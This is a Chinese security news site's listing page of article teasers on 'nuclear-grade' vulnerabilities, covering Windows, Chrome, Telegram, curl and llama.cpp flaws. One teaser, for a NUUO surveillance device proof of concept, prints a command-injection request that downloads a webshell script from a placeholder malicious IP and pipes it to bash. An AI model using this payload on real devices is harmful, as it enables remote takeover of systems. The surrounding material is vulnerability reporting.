核弹级漏洞 | CN-SEC 中文网

安全新闻

紧急预警！微软Telnet惊现零点击核弹级漏洞，旧系统用户速查！

一、漏洞直击：30秒看懂致命威胁漏洞代号：MS-TNAP身份验证倒置杀伤力：💣 0Click攻击（无需用户交互）攻击效果：黑客可完全绕过密码验证，直取系统管理员权限，如同用万能钥匙打开所有保险库！技术...

05月07日25 views评论

阅读全文

安全漏洞

核弹级漏洞预警｜NUUO监控设备远程沦陷实录(CVE-2025-1338) POC

0x01 漏洞杀伤链攻击向量： GET /handle_config.php?log=;curl${IFS}http://恶意IP/webshell.sh|bash; HTTP/1.1Host: t...

04月29日51 views评论

阅读全文

安全文章

HTB Analytics靶机：藏在数据报表里的核弹级漏洞

当数据分析平台成为黑客的后门电梯！HackTheBox Analytics靶机，用一场轻松秒杀的渗透实验，揭开现代企业最致命的信任陷阱，这不仅是技术挑战，更是一次对企业安全盲点的降维打击，在数据驱动决...

03月21日6 views评论

阅读全文

安全新闻

微软惊现「零点击」核弹级漏洞！打开邮件就中招？

⚠️ 划重点：无需点击！无需下载！看一眼邮件，电脑就被黑？最近微软修复了一个高危漏洞（CVE-2025-21298），危险程度直接拉满（CVSS 9.8）！攻击者只要发封邮件，你连鼠标都不用点，系统就...

02月04日76 views评论

阅读全文

人工智能安全

人工智能大模型框架核弹级漏洞复现

本文由CVES实验室-7resp4ss同学原创一、概述该漏洞源于llama.cpp中的rpc-server功能，评分9.8分在b3561版本前，llama.cpp在分布式推理的场景下存在可以导致rce...

09月19日135 views评论

阅读全文

安全新闻

【核弹级漏洞预警】Windows 远程桌面授权服务远程代码执行漏洞(CVE-2024-38077)

漏洞描述:这一漏洞存在于Windows远程桌面许可管理服务（RDL）中，该服务被广泛部署于开启Windows远程桌面（3389端口）的服务器，用于管理远程桌面连接许可,攻击者无需任何前置条件,无需用户...

08月09日80 views评论

阅读全文

安全新闻

360安全大模型实战笔记：核弹级漏洞，拿捏！

✦•✦“在野0day漏洞，是核弹级别的网络武器，这种存在于文档中的0day更是隐蔽、罕见。一枚0day漏洞甚至卖出百万甚至到千万美金的高价，所以普通的小黑客用不起，用它的都是具备强大资源背景的国家级黑...

05月15日16 views评论

阅读全文

安全新闻

0day Telegram核弹级漏洞？1day Telegram Windows客户端RCE漏洞复现

本文字数：1947｜预计3分钟读完Telegram是一款跨平台的即时通讯软件，用户可以相互交换加密与自毁消息，发送照片、影片等所有类型文件。你和我聊天，电脑就有可能被控制？最早发现这则消息是在8号晚上...

04月14日78 views评论

阅读全文

安全新闻

【核弹级漏洞预警】苹x果、微x、支x宝、小x浏览器、携x应用等均存在任意文件读取漏洞

一、漏洞描述漏洞描述:Google Chrome 是 Google 公司开发的网页浏览器,Web Audio 是用于在浏览器中进行音频处理和合成的 API,Google Chrome 121.0.61...

02月29日57 views评论

阅读全文

安全漏洞

[核弹级漏洞]Windows11全版本系统安全中心bug,导致RCE[附POC]

疯狂星期四，Vme50，听我跟你细嗦原文始发于微信公众号（知攻善防实验室）：[核弹级漏洞]Windows11全版本系统安全中心bug,导致RCE[附POC]

12月11日34 views评论

阅读全文

安全新闻

【核弹级漏洞预警】苹果、微信、支付宝、小米浏览器、携程应用等均存在任意文件读取漏洞

一、漏洞描述微信、支付宝、小米浏览器、携程应用等国内主流软件均存在任意文件读取漏洞。此漏洞源于谷歌浏览器内核漏洞，而国内很多app，包括苹果内置浏览器均为谷歌浏览器，故影响全系列产品。Google C...

11月19日264 views评论

阅读全文

安全新闻

号称下一个核弹级漏洞？对此专家这样说

近日，奇安信CERT监测到curl官方发布安全更新，修复了一个已知的堆溢出漏洞（漏洞编号：CVE-2023-38545）。据奇安信CERT的漏洞验证结果显示，在一定条件下，攻击者可以构造恶意主机名触发...

10月13日19 views评论

阅读全文

在线咨询

微信